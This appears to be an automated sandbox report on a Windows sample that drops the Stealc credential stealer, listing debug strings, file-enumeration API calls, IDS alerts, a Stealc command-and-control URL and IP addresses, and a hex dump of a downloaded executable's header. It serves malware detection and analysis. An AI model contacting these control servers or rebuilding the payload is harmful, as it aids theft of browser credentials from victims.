Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243252016.0000021717B20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000003.00000002.2170329966.000000006C827000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000016.00000002.2733109861.000000006C7D7000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296044980.0000021731FB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.2.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: P[<_C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: freebl3.pdbp source: freebl3.dll.2.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: I[L<C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0041D8B1 FindFirstFileExA,	0_2_0041D8B1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0368DB18 FindFirstFileExA,	0_2_0368DB18
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004015C0 VirtualProtect,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	2_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	2_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C72261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	3_2_6C72261E

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp\u2ts.2	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.5:49705 -> 185.172.128.90:80
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49708 -> 185.172.128.150:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49708 -> 185.172.128.150:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.150:80 -> 192.168.2.5:49708
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49708 -> 185.172.128.150:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.150:80 -> 192.168.2.5:49708

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.172.128.150/c698e1bc8a2f5e6d.php
Source: Malware configuration extractor	URLs: http://185.172.128.150/c698e1bc8a2f5e6d.php

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49805

Yara detected Generic Downloader

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217294b49f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2172952eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49750 -> 91.215.85.66:15647

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:26:55 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 28 Apr 2024 23:15:02 GMTETag: "4ba00-617304e711e86"Accept-Ranges: bytesContent-Length: 309760Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5a cd db 04 1e ac b5 57 1e ac b5 57 1e ac b5 57 13 fe 6a 57 3e ac b5 57 13 fe 55 57 99 ac b5 57 13 fe 54 57 30 ac b5 57 17 d4 26 57 1d ac b5 57 1e ac b4 57 6f ac b5 57 ab 32 50 57 1f ac b5 57 13 fe 6e 57 1f ac b5 57 ab 32 6b 57 1f ac b5 57 52 69 63 68 1e ac b5 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 16 7b b5 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 08 01 00 00 30 60 01 00 00 00 00 4f 3e 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 61 01 00 04 00 00 9b 51 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 84 01 00 28 00 00 00 00 90 5f 01 a8 b9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 61 01 d8 13 00 00 f0 21 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 79 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f3 07 01 00 00 